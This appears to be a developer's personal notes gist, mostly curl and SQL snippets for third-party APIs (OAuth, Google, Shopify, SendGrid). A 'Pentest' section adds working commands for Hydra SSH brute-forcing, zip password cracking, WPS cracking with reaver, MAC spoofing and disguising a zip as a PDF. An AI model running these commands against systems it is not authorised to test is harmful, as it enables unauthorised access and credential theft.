select * from all_tab_columns; select * from all_triggers where trigger_name like upper('enum_to_fee_service');

dbms output enable

BEGIN dbms_output.enable; dbms_output.put_line('hello'); END;

'select' combining, resultset combining

union
union all
intersect
minus

create backup of the table

EXECUTE IMMEDIATE 'CREATE TABLE my_table AS SELECT * FROM my_original_table';
/

copy all records from the table

EXECUTE IMMEDIATE 'INSERT INTO my_table AS SELECT * FROM my_original_table';
/

Tools

tasks automation & business flows & connections between applications

authentication

Amazon Cognito

okta.com

auth0.com

authy (twilio)

Yahoo authentication

!!! important: OpenID Connect Permissions: !!!

App ID
${APP_ID}
Client ID (Consumer Key)
${CLIENT_ID}
Client Secret (Consumer Secret)
${CLIENT_SECRET}

request authentication

# step 1
https://api.login.yahoo.com/oauth2/request_auth?client_id=${CLIENT_ID}&response_type=code&redirect_uri=https://ec2-52-29-176-00.eu-central-1.compute.amazonaws.com&scope=profile,email&nonce=6b526ab2-c0eb

# step 2 
# RESPONSE "Yahoo code"
# code=${CLIENT_CODE}

request Token

curl -X POST https://api.login.yahoo.com/oauth2/get_token --data "code=${CLIENT_CODE}&grant_type=authorization_code&client_id=${CLIENT_ID}&client_secret=${CLIENT_SECRET}&redirect_uri=https://ec2-52-29-176-00.eu-central-1.compute.amazonaws.com&response_type=code"
curl --verbose -X POST --data "access_token=${ACCESS_TOKEN}" https://api.login.yahoo.com/openid/v1/userinfo

encode string for header request

import base64
encodedBytes = base64.b64encode(f"{client_id}:{client_secret}".encode("utf-8"))
encodedStr = str(encodedBytes, "utf-8")

Google authentication

links

google project

it is Working only from remote ( AWS EC2 ) host

<html lang="en">
  <head>
    <meta name="google-signin-scope" content="profile email">
    <meta name="google-signin-client_id" content="273067202806-6cc49luinddclo4t6.apps.googleusercontent.com">
    <script src="https://apis.google.com/js/platform.js" async defer></script>
  </head>
  <body>
    <div class="g-signin2" data-onsuccess="onSignIn" data-theme="dark">google button</div>
    <script>
      function onSignIn(googleUser) {
        // Useful data for your client-side scripts:
        var profile = googleUser.getBasicProfile();
        console.log("ID: " + profile.getId()); // Don't send this directly to your server!
        console.log('Full Name: ' + profile.getName());
        console.log('Given Name: ' + profile.getGivenName());
        console.log('Family Name: ' + profile.getFamilyName());
        console.log("Image URL: " + profile.getImageUrl());
        console.log("Email: " + profile.getEmail());

        // The ID token you need to pass to your backend:
        var id_token = googleUser.getAuthResponse().id_token;
        console.log("ID Token for backend: " + id_token);
      }
    </script>


    <a href="#" onclick="signOut();">Sign out</a>
    <script>
      function signOut() {
        var auth2 = gapi.auth2.getAuthInstance();
        auth2.signOut().then(function () {
          console.log('User signed out.');
        });
      }
    </script>
    
  </body>
</html>

google rest api services, collaboration with google rest api service

example of using via rest client postman

Links

GDRIVE_URL=https://www.googleapis.com

## obtain token for REST API collaboration 
# register REDIRECT_URL via "OAuth 2.0 Client IDs" "Authorised redirect URIs": https://console.cloud.google.com/apis/credentials
REDIRECT_URL=https://google.com
CLIENT_ID=5344876.....-scmq9ph1tbrvva7p353......apps.googleusercontent.com
SCOPE=https://www.googleapis.com/auth/drive.metadata.readonly
# open in browser
x-www-browser https://accounts.google.com/o/oauth2/v2/auth?scope=${SCOPE}&include_granted_scopes=true&response_type=token&state=state_parameter_passthrough_value&redirect_uri=${REDIRECT_URL}&client_id=${CLIENT_ID}
# copy from redirect url "access_token" field
# curl -X GET -v  https://accounts.google.com/o/oauth2/token

TOKEN="ya29.a0AfB_byBl7oToNlM..."
curl -H "Authorization: Bearer $TOKEN" ${GDRIVE_URL}/drive/v3/about
curl -H "Authorization: Bearer $TOKEN" ${GDRIVE_URL}/drive/v3/files

token update

json_body='{"grant_type":"authorization_code","code":"****my_token","client_id":"******.googleusercontent.com","client_secret":"*******client_secret","redirect_uri":"http://localhost:3000"}'
curl -X POST https://oauth2.googleapis.com/token --data ${json_body}
# Cloud Console: Enable the YouTube Data API v3 for your project and get your API key.
YOUR_VIDEO_ID=....
YOUR_API_KEY=....
curl -X GET https://www.googleapis.com/youtube/v3/videos?part=statistics&id=${YOUR_VIDEO_ID}&key=${YOUR_API_KEY}

captcha

google captcha

reCaptcha client code reCaptcha server code my own project with re-captcha

index file

<html>
        <head>
                <script src="https://www.google.com/recaptcha/api.js?render=6LcJIwYaAAAAAIpJLnWRF44kG22udQV"></script>
          
<script>
      function onClick(e) {
        //e.preventDefault();     
              console.log("start captcha");
        grecaptcha.ready(function() {
          grecaptcha.execute('6LcJIwYaAAAAAIpJLnWRF44kG22udQV', {action: 'submit'}).then(function(token) {
              console.log(token);                                     
          });
        });
      }
  </script>

        </head>
        <body>
                <button title="captcha" onclick="onClick()" >captcha </button>
        </body>
</html>

start apache locally in that file

docker run --rm --name apache -v $(pwd):/app -p 9090:8080 bitnami/apache:latest
x-www-browser http://localhost:9090/index.html

example of checking response

# google key
GOOGLE_SITE_KEY="6Ldo3dsZAAAAAIV6i6..."
GOOGLE_SECRET="6Ldo3dsZAAAAACHkEM..."

CAPTCHA="03AGdBq26Fl_hBnLn7lNf5s53xTRN23yt1OeS4Y7vV6ARSEehMuE_0uKL..."
echo $CAPTCHA
curl -X POST -F "secret=$GOOGLE_SECRET" -F "response=$CAPTCHA" https://www.google.com/recaptcha/api/siteverify

address

US Zip codes

# Plano TX
curl https://public.opendatasoft.com/explore/dataset/us-zip-code-latitude-and-longitude/table/?q=plano

# coordinates
curl -X GET https://public.opendatasoft.com/api/records/1.0/search/?dataset=us-zip-code-latitude-and-longitude&q=Plano&facet=state&facet=timezone&facet=dst

Google Maps

google maps api links

Google maps platform, document root Request API Key How to use api keys Example of showing credentials cloud billing console

project links

my google project dashboard create new web project create new web project project settings dashboard of project, API and services OAuth consent screen:-> Any User in google Account OAuth credentials:-> select OAuth Client IDs->ClientId

Google maps REST API

place search place details Review, for specific location with additional authentication by Google

# activate api key
 YOUR_API_KEY="AIzaSyDTE..."
echo $YOUR_API_KEY

# attempt to find place by name 
# x-www-browser https://developers.google.com/places/web-service/search
SEARCH_STRING="Fallahi%20Zaher%20Attorney"
curl -X GET "https://maps.googleapis.com/maps/api/place/findplacefromtext/json?input=${SEARCH_STRING}&inputtype=textquery&fields=place_id,photos,formatted_address,name,rating,geometry&key=${YOUR_API_KEY}"
# place_id="ChIJl73rFVTf3IARQFQg3ZSOaKo"

# detail about place (using place_id) including user's reviews
# x-www-browser https://developers.google.com/places/web-service/details
curl -X GET "https://maps.googleapis.com/maps/api/place/details/json?place_id=${place_id}&fields=name,rating,review,formatted_phone_number&key=$YOUR_API_KEY"
# unique field here - time

more that 5 review API:

sms broadcasting

email tools

e-mail broadcasting

sendgrid api

# get all templates
curl -X "GET" "https://api.sendgrid.com/v3/templates" \
-H "Authorization: Bearer $API_KEY" \
-H "Content-Type: application/json"

# get template
curl --request GET \
--url https://api.sendgrid.com/v3/templates/d-5015e600bedd47b49e09d7e5091bf513 \
--header "authorization: Bearer $API_KEY" \
--header 'content-type: application/json'
# send 
curl --request POST \
--url https://api.sendgrid.com/v3/mail/send \
--header "authorization: Bearer $API_KEY" \
--header 'content-type: application/json' \
--data @email-data.json

email-data.json

{
        "personalizations":[
                {
                        "to":[
                                {"email":"[email protected]","name":"Vitalii"}
                        ],
                        "subject":"test sendgrid"
                }
        ],
        "content": [{"type": "text/plain", "value": "Heya!"}],
        "from":{"email":"[email protected]","name":"Vitalii"},
        "reply_to":{"email":"[email protected]","name":"Vitalii"}
}

redirect

screenshots

  • site-shot.com
USER_KEY=YAAIEYK....
curl -L -X POST -H "Content-Type: application/x-www-form-urlencoded" -H "Accept: text/plain"  -H "userkey: $USER_KEY" -F "DEBUG=True" -F "url=google.com" https://api.site-shot.com 

curl -L -X POST -H "Accept: text/plain"  -H "userkey: $USER_KEY" -F "DEBUG=True" -F "url=google.com" https://site-shot.com?DEBUG=True

curl -X POST -H "userkey:$USER_KEY" https://api.site-shot.com/?url=google.com

curl -X POST -H "userkey:$USER_KEY" -F "url=http://www.emsylaw.com" -F "format=jpg" -o emsylaw.jpg https://api.site-shot.com 

image compression

shortpixel.com

url1="https://staging.s3.us-east-1.amazonaws.com/img/dir/chinese/bu-2739.jpeg"
body='{"key": "'$SHORTPIXEL_KEY'", "plugin_version": "dbrbr", "lossy": 2, "resize": 0, "resize_width": 0, "resize_height": 0, "cmyk2rgb": 1, "keep_exif": 0, "convertto": "", "refresh": 0, "urllist": ["'$url1'"], "wait": 35}'

curl -H "Content-Type: application/json" --data-binary $body -X POST https://api.shortpixel.com/v2/reducer.php

image upload

imgbb

# https://api.imgbb.com/
API_KEY_IMGBB=9f......
IMAGE_FILE=handdrawing-01.jpg
IMAGE_NAME="${IMAGE_FILE%.*}"
echo $IMAGE_FILE"  "$IMAGE_NAME

curl --location --request POST "https://api.imgbb.com/1/upload?&key=$API_KEY_IMGBB&name=${IMAGE_NAME}" \
 -F "image=@${IMAGE_FILE}" -H "accept: application/json" | jq . 

feedback collector

canny

export API_KEY=...
# boards list
curl https://canny.io/api/v1/boards/list -d apiKey=$API_KEY | jq .
curl https://canny.io/api/v1/boards/list?apiKey=$API_KEY | jq .

# board by id
export BOARD_ID=5f8cba47...
curl https://canny.io/api/v1/boards/retrieve -d apiKey=$API_KEY -d id=BOARD_ID | jq .

yelp

yelp_id='law-office-of-spojmie-nasiri-pleasanton-5'

curl --location --request GET 'https://api.yelp.com/v3/businesses/law-office-of-camelia-mahmoudi-san-jose-3' \
--header "Authorization: Bearer $API_KEY"

curl --location --request GET 'https://api.yelp.com/v3/businesses/law-office-of-camelia-mahmoudi-san-jose-3/reviews' \
--header "Authorization: Bearer $API_KEY" | jq .

facebook

links

get profile_id from facebook page

curl -X GET https://www.facebook.com/$PROFILE_NAME | grep profile_owner

get access token

# https://www.facebook.com/v7.0/dialog/oauth?client_id=${APP_ID}&redirect_uri=${REDIRECT_URL}&state=state123abc
# REDIRECT_URI !!! DON'T REMOVE trailing slash !!! 
curl -X GET https://graph.facebook.com/v7.0/oauth/access_token?client_id=${APP_ID}&redirect_uri=${REDIRECT_URI}&client_secret=${APP_SECRET}&code=${CODE_PARAMETER}
# b'{"access_token":"$ACCESS_TOKEN","token_type":"bearer","expires_in":5181746}'

get profile info

curl -X GET https://graph.facebook.com/v7.0/me?fields=id,last_name,name&access_token=${ACCESS_TOKEN}"

get ratings

# $PROFILE_ID/ratings?fields=reviewer,review_text,rating,has_review
curl -i -X GET \
 "https://graph.facebook.com/v8.0/$PROFILE_ID/ratings?fields=reviewer%2Creview_text%2Crating%2Chas_review&access_token=$ACCESS_TOKEN"

# https://developers.facebook.com/tools/explorer/?method=GET&path=$PROFILE_ID%2Fratings%3Ffields%3Drating%2Creview_text%2Creviewer&version=v8.0
# https://developers.facebook.com/tools/explorer/${APP_ID}/?method=GET&path=${PROFILE_NAME}%3Ffields%3Dreview_text&version=v8.0

possible fields:

  • name
  • created_time
  • rating
  • review_text
  • recommendation_type
  • reviewer
  • has_review
 {
  "data": [
    {
      "created_time": "2020-08-17T20:40:26+0000",
      "recommendation_type": "positive",
      "review_text": "let's have a fun! it is a great company for that"
    }
  ]
}

user activities

external data sources

user guide user tutorials

api contracts

messengers

:TODO: Telegram bot

social networks

linkedin

linkedin api

login with linkedin
<html><body>
<a href="https://www.linkedin.com/oauth/v2/authorization?response_type=code&client_id=78j2mw9cg7da1x&redirect_uri=http%3A%2F%2Fec2-52-29-176-43.eu-central-1.compute.amazonaws.com&state=my_unique_value_generated_for_current_user&scope=r_liteprofile%20r_emailaddress"> login with LinkedIn </a>
</body></html>

example of response from LinkedIn API:

http://ec2-52.eu-central-1.compute.amazonaws.com/?code=<linkedin code>&state=<my_unique_value_generated_for_current_user>
linkedin profile api
curl -X GET -H "Authorization: Bearer $TOKEN" https://api.linkedin.com/v2/me

answer example:

{"localizedLastName":"Cherkashyn","profilePicture":{"displayImage":"urn:li:digitalmediaAsset:C5103AQ..."},"firstName":{"localized":{"en_US":"Vitalii"},"preferredLocale":{"country":"US","language":"en"}},"lastName":{"localized":{"en_US":"Cherkashyn"},"preferredLocale":{"country":"US","language":"en"}},"id":"9yP....","localizedFirstName":"Vitalii"}
collaboration with Contact API

application permissions: r_emailaddress
documentation
documentation

web engine cms detector

e-commerce

shopify

x-www-browser https://$SHOPIFY_SHOP_NAME.myshopify.com &
x-www-browser https://$SHOPIFY_SHOP_NAME.myshopify.com/admin &	
# shopify product count
curl --location --header "X-Shopify-Access-Token: ${SHOPIFY_AUTH_TOKEN}" -X GET "https://${SHOPIFY_SHOP_NAME}.myshopify.com/admin/api/2021-04/products/count.json" 
# shopify product by id
curl --location -X GET --header "X-Shopify-Access-Token: ${SHOPIFY_AUTH_TOKEN}" "https://${SHOPIFY_SHOP_NAME}.myshopify.com/admin/api/2021-04/products/${1}.json" | jq .
# shopify get all products
curl --location --header "X-Shopify-Access-Token: ${SHOPIFY_AUTH_TOKEN}"  -X GET "https://${SHOPIFY_SHOP_NAME}.myshopify.com/admin/api/2021-04/products.json?fields=id" | jq .	
# get variants count
curl --location -X GET "https://${SHOPIFY_API_KEY}:${SHOPIFY_API_PASSWORD}@${SHOPIFY_SHOP_NAME}.myshopify.com/admin/api/2021-04/products/${PRODUCT_ID}/variants/count.json" | jq .
# shopify product variant by id
curl --location -X GET --header "X-Shopify-Access-Token: ${SHOPIFY_AUTH_TOKEN}" "https://${SHOPIFY_SHOP_NAME}.myshopify.com/admin/api/2021-07/variants/${1}.json" | jq . 
# get metadata for product by id
curl --location -X GET "https://${SHOPIFY_API_KEY}:${SHOPIFY_API_PASSWORD}@${SHOPIFY_SHOP_NAME}.myshopify.com/admin/api/2021-04/products/${PRODUCT_ID}/metafields.json" | jq .

# shopify create product
curl -v -X POST -H "X-Shopify-Access-Token:${SHOPIFY_AUTH_TOKEN}" --data "{'product': {'title': 'test-product-remove-me', 'product_type': 'Framed Prints', 'published': True, 'vendor': 'Classy Art', 'tags': 'Furniture,Accessories,Wall Art,Category:Accessories,Category_Accessories,Category:Wall Art,Category_Wall Art,Color:Brown,Color_Brown,Product Type:Framed Prints,Product Type_Framed Prints,Brand:Classy Art,Brand_Classy Art', 'taxable': True, 'options': None, 'variants': [{'option1': None, 'option2': None, 'option3': None, 'price': 139.99, 'compare_at_price': None, 'sku': '1055', 'weight_unit': 'lb', 'weight': 0, 'inventory_management': 'shopify', 'inventory_policy': 'continue'}], 'status': 'draft'}}"  https://${SHOPIFY_SHOP_NAME}.myshopify.com/admin/api/2021-04/products.json
# shopify update product
curl --header "X-Shopify-Access-Token: ${SHOPIFY_AUTH_TOKEN}" --request PUT "https://${SHOPIFY_SHOP_NAME}.myshopify.com/admin/api/2021-04/products/${PRODUCT_ID}.json" \
--header 'Content-Type: application/json' \
--data-binary '@product.json'
# delete product by id
curl --location --header "X-Shopify-Access-Token: ${SHOPIFY_AUTH_TOKEN}"  -X DELETE "https://${SHOPIFY_SHOP_NAME}.myshopify.com/admin/api/2021-04/products/$1.json"
# remove variant, delete variant in "standard product" (has only one variant )  leads to remove product
curl --location -w "response-code: %{http_code}\n" -X DELETE "https://${SHOPIFY_API_KEY}:${SHOPIFY_API_PASSWORD}@${SHOPIFY_SHOP_NAME}.myshopify.com/admin/api/2021-04/products/${PRODUCT_ID}/variants/${VARIANT_ID}.json"

# add metadata to image 
curl --location -X PUT "https://${SHOPIFY_API_KEY}:${SHOPIFY_API_PASSWORD}@${SHOPIFY_SHOP_NAME}.myshopify.com/admin/api/2021-04/products/${PRODUCT_ID}/images/${IMAGE_ID}.json"  \
--header 'Content-Type: application/json' \
--data-raw '{"image": {"id": 28125015310400,"metafields": [{"key": "test2","value": "test3","value_type": "string","namespace": "tags", "imageid":28125015310400}]}}'
# get image count by product
curl --location -X GET "https://${SHOPIFY_API_KEY}:${SHOPIFY_API_PASSWORD}@${SHOPIFY_SHOP_NAME}.myshopify.com/admin/api/2021-04/products/${PRODUCT_ID}/images/count.json" | jq .
# get images by product
curl --location -X GET "https://${SHOPIFY_API_KEY}:${SHOPIFY_API_PASSWORD}@${SHOPIFY_SHOP_NAME}.myshopify.com/admin/api/2021-04/products/${PRODUCT_ID}/images.json" | jq .
# get image metadata from !!! global account storage !!!
curl --location -X GET https://${SHOPIFY_API_KEY}:${SHOPIFY_API_PASSWORD}@${SHOPIFY_SHOP_NAME}.myshopify.com/admin/api/2021-04/metafields.json?metafield[imageid]=${IMAGE_ID}

# get all collections
curl --location -X GET "https://${SHOPIFY_API_KEY}:${SHOPIFY_API_PASSWORD}@${SHOPIFY_SHOP_NAME}.myshopify.com/admin/api/2021-04/smart_collections.json" | jq .
# get collection by id 
COLLECTION_ID=270289993909
curl --location -X GET "https://${SHOPIFY_API_KEY}:${SHOPIFY_API_PASSWORD}@${SHOPIFY_SHOP_NAME}.myshopify.com/admin/api/2021-04/smart_collections/{$COLLECTION_ID}.json" | jq .
# delete collection by id 
curl --location -X DELETE "https://${SHOPIFY_API_KEY}:${SHOPIFY_API_PASSWORD}@${SHOPIFY_SHOP_NAME}.myshopify.com/admin/api/2021-04/smart_collections/{$COLLECTION_ID}.json" | jq .

# get policies
curl --location --request GET "https://${SHOPIFY_API_KEY}:${SHOPIFY_API_PASSWORD}@${SHOPIFY_SHOP_NAME}.myshopify.com/admin/api/2021-04/policies.json"
# get policies with token
curl --location --header "X-Shopify-Access-Token: ${SHOPIFY_AUTH_TOKEN}" --request GET "https://${SHOPIFY_SHOP_NAME}.myshopify.com/admin/api/2021-04/policies.json"
# get access scopes
curl --location --request GET "https://${SHOPIFY_API_KEY}:${SHOPIFY_API_PASSWORD}@${SHOPIFY_SHOP_NAME}.myshopify.com/admin/oauth/access_scopes.json" | jq .
# get shop description 
curl --location --request GET "https://${SHOPIFY_API_KEY}:${SHOPIFY_API_PASSWORD}@${SHOPIFY_SHOP_NAME}.myshopify.com/admin/api/2021-04/shop.json" --silent | jq .

Pentest

trainings, tutors, interesting links

security cheat sheet open source software

Tools

  • http://www.mh-sec.de/downloads.html.en
  • Burp Suite
    • JSON Beautifier
    • Param miner
    • HTTP Request Smuggler
    • Backslash Powered Scanner
    • Reflected Parameters
    • Software Vulnerability Scanner
    • Java Deserialization Scanner
    • .Net Beautifier
    • Copy As Python-Request
    • Collaborator Everywhere
    • Custom Parameter Handler
    • Authmatrix
    • GraphQL Raider
    • Piper
    • JSON Web Token Attacker
    • InQl - Introspection GraphQL Scanner
  • dns propogation checker
  • :TODO: shodan

OS

Phone OS

Linux OS for phone

Linux OS for phone tools

Messengers

Discord: Use "https://play.google.com/store/apps/details?id=com.discord&hl=en" to find out more about Discord.

Free hosting

  1. 000WebHost
  2. InfinityFree
  3. AwardSpace
  4. GitHub Pages
  5. Netlify
  6. Wix
  7. WordPress
  8. SquareSpace

connection

change mac address

# list of devices
iw dev

# sudo apt-get install macchanger
macchanger -s wlp1s0
sudo ifconfig wlp1s0 down
# ip link set wlp1s0 down
sudo macchanger -r wlp1s0
sudo ifconfig wlp1s0 up
macchanger -s wlp1s0

list of all accessible wifi points

# force rescan 
nmcli device wifi rescan
# all points
nmcli device wifi
# all fields 
nmcli -f ALL device wifi
# all fields with using in script 
nmcli -t -f ALL device wifi
nmcli -m multiline  -f ALL device wifi

# alternative way 
iwlist wlan0 scan 

# alternative way
iw wlan0 scan

# alternative way
sudo apt install wavemon

connect to selected network

# install tool
apt-get install wireless-tools wpasupplicant
# save password
wpa_passphrase YourSSID >> /etc/wpa_supplicant.conf

# check adapter
iwconfig
# connect to netowrk
wpa_supplicant -D wext -i wlan0 -B -c /etc/wpa_supplicant.conf

# sudo systemctl restart wpa_supplicant

check your current IP address

  • check ip address via proxy
curl --proxy localhost:8118 'https://api.ipify.org'
curl 'https://api.ipify.org'
curl --silent -X GET https://getfoxyproxy.org/geoip/ | grep -A 2 "Your IP Address and Location" | awk -F "strong" '{print $2 $4}' | tr '><' ' '
  • check ip address directly
curl 'https://api.ipify.org'
curl 'https://api.ipify.org?format=json'
fetch('https://api.ipify.org')
  .then(response => {
    if (!response.ok) {
      throw new Error(`HTTP error! Status: ${response.status}`);
    }
    return response.text();
  })
  .then(ip => {
    console.log('Your IP address is:', ip);
  })
  .catch(error => {
    console.error('There was an error fetching the IP address:', error);
  });

proxy

proxy list tools

https://github.com/cherkavi/python-utilitites/blob/master/proxy/foxyproxy-generator.py
https://addons.mozilla.org/de/firefox/addon/foxyproxy-standard/

Darknet connection

activate tor connection

  • installation
sudo apt install tor
sudo apt install privoxy
  • configuration sudo vim /etc/privoxy/config
forward-socks5t / 127.0.0.1:9050 .
forward-socks4a / 127.0.0.1:9050 .
  • applying
# tor
sudo service tor restart
# /etc/init.d/privoxy start
sudo service privoxy restart
  • check your ip afterwards
# via TOR 
curl --proxy localhost:8118 'https://api.ipify.org'
# direct connect
curl 'https://api.ipify.org'
  • stop, stop tor, stop private proxy
systemctl stop tor
systemctl status tor

systemctl stop privoxy
systemctl status privoxy

activate i2p(Invisible Internet Project) connection

  • installation
sudo apt update
sudo apt install openjdk-8-jre i2p
  • open ports
iptables -I INPUT 1 -i wlan0 -p tcp --tcp-flags SYN,RST,ACK SYN  
iptables -I INPUT 1 -i wlan0 -p udp --dport 20000 -m conntrack --ctstate NEW -j ACCEPT
  • start service
/usr/bin/i2prouter start
  • i2p router panel
x-www-browser http://127.0.0.1:7657/
  • use privoxy?

Remote host analyzing

whois cli console whois

# apt install whois
whois google.com

scan ports

nmap -sV -p 1-65535 {hostname}

web scan

nikto -h {host name}

cms detector ContentManagementSystem detector

https://www.web4future.com/free/cms-detector.htm
https://whatcms.org
https://builtwith.com

detect possible endpoints

[2ip.ru/cms](find cms)

/rotots.txt
/admin.php
/admin
/admin/admin.php
/manager
/administrator
/login

Request information

Remote host connection

Hydra

# installation
apt install hydra
# usage: hydra -l <username> -p <password> <server> <service> -o <log output file> -s <custom service port> 
# usage: hydra -L <username file> -P <password file> <server> <service>
# usage: hydra -l <username> -p <password> -M <server list> <service> -o <log output file> -s <custom service port> 
# usage: hydra -C <file with login:password colon delimiter> -M <server list> <service> -o <log output file> -s <custom service port> 

hydra -l admin -p admin_pass 10.10.10.10 ssh
hydra -L logins.txt -P passwords.txt 10.10.10.10 ssh -o output.log

online services

online text info exchange

GSM

phone info

HLR request

sms

sms receive sms receive

e-mail

temp email address

permanent providers

regular mail providers

https://alternativeto.net/software/openmailbox/

files

zip -r archive.zip folder/to/compress
mv archive.zip archive.pdf
vim archive.pdf # "%PDF-1.5"
curl -i -F name=some-archive.pdf -F [email protected] https://uguu.se/api.php?d=upload | grep "uguu.se"
wget https://a.uguu.se/1JQuulht48T6_1571004483891-2.pdf

archive

open zip with brute force zip

# sudo apt install fcrackzip
fcrackzip --brute-force --length 1-20 --use-unzip 1.zip
fcrackzip -v -u -b 1.zip

# statistic: 8 chars - 62 days

wifi

initiate monitor mode on interface

ifconfig 
# ( result - wlan0 )
airmon-ng check kill
airmon-ng check 
# ( should be empty )
airmon-ng start wlan0 
# ( result - wlan0mon )
airodump-ng wlan0mon 
# ( result - BSSID )
reaver -i wlan0mon -b <BSSID> -vv -K 1

md5sum, hash

https://hashkiller.co.uk/Cracker/MD5
https://md5decrypt.net
https://www.md5.ovh/index.php?controller=Api
https://crackstation.net/

android

android market

View raw

(Sorry about that, but we can’t show files that are this big right now.)

View raw

(Sorry about that, but we can’t show files that are this big right now.)

View raw

(Sorry about that, but we can’t show files that are this big right now.)

View raw

(Sorry about that, but we can’t show files that are this big right now.)

View raw

(Sorry about that, but we can’t show files that are this big right now.)

View raw

(Sorry about that, but we can’t show files that are this big right now.)

View raw

(Sorry about that, but we can’t show files that are this big right now.)

View raw

(Sorry about that, but we can’t show files that are this big right now.)

View raw

(Sorry about that, but we can’t show files that are this big right now.)

View raw

(Sorry about that, but we can’t show files that are this big right now.)

View raw

(Sorry about that, but we can’t show files that are this big right now.)

View raw

(Sorry about that, but we can’t show files that are this big right now.)

View raw

(Sorry about that, but we can’t show files that are this big right now.)

View raw

(Sorry about that, but we can’t show files that are this big right now.)

View raw

(Sorry about that, but we can’t show files that are this big right now.)

View raw

(Sorry about that, but we can’t show files that are this big right now.)

View raw

(Sorry about that, but we can’t show files that are this big right now.)

View raw

(Sorry about that, but we can’t show files that are this big right now.)

View raw

(Sorry about that, but we can’t show files that are this big right now.)

View raw

(Sorry about that, but we can’t show files that are this big right now.)

View raw

(Sorry about that, but we can’t show files that are this big right now.)

View raw

(Sorry about that, but we can’t show files that are this big right now.)

View raw

(Sorry about that, but we can’t show files that are this big right now.)

View raw

(Sorry about that, but we can’t show files that are this big right now.)

View raw

(Sorry about that, but we can’t show files that are this big right now.)

View raw

(Sorry about that, but we can’t show files that are this big right now.)

View raw

(Sorry about that, but we can’t show files that are this big right now.)

View raw

(Sorry about that, but we can’t show files that are this big right now.)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment